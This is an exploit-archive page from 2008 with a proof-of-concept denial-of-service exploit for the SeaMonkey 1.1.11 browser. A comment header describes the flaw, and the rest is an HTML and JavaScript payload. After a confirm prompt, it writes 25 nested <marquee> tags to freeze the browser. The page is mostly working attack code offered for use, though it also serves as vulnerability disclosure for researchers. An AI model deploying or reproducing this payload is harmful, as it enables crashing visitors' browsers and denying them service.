Home / exploits seamonkey-dos.txt
Posted on 08 September 2008
<!-- Title: SeaMonkey 1.1.11 Remote Denial of Service Exploit PoC Summary: Web-browser, advanced e-mail and newsgroup client, IRC chat client, and HTML editing made simple - all your Internet needs in one application. Product web page: http://www.seamonkey-project.org/ Desc: SeaMonkey suffers from a remote denial of service vulnerability (DoS), using a special html file with the <marquee> tag multiple times (>24). Successfully exploiting these issues allows remote attackers to cause the application to freeze, denying service to legitimate users. Tested on Microsoft Windows XP SP2 (English) Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic liquidworm [t00t] gmail [d0t] com http://www.zeroscience.org 08.09.2008 --> <html> <title>SeaMonkey 1.1.11 Remote Denial of Service Exploit</title> <head> <body> <br /><br /><br /><br /> <br /><br /><br /><br /> <br /><br /><br /><br /> <center> <script type="text/javascript"> document.write("<kbd>Wooow Camel..!! WOW!</kbd>"); function t00t() { for(i=0; i < 25; i++) { document.write("<marquee>"); } } alert("SeaMonkey 1.1.11 Remote Denial of Service Exploit"); var b0x = confirm("Press OK to start exploitation Press Cancel to skip exploitation"); if (b0x == true) { t00t(); } else { alert("Allrighty Then!"); window.location.href = "http://www.disneyland.com"; } </script> </center> </body> </head> </html>
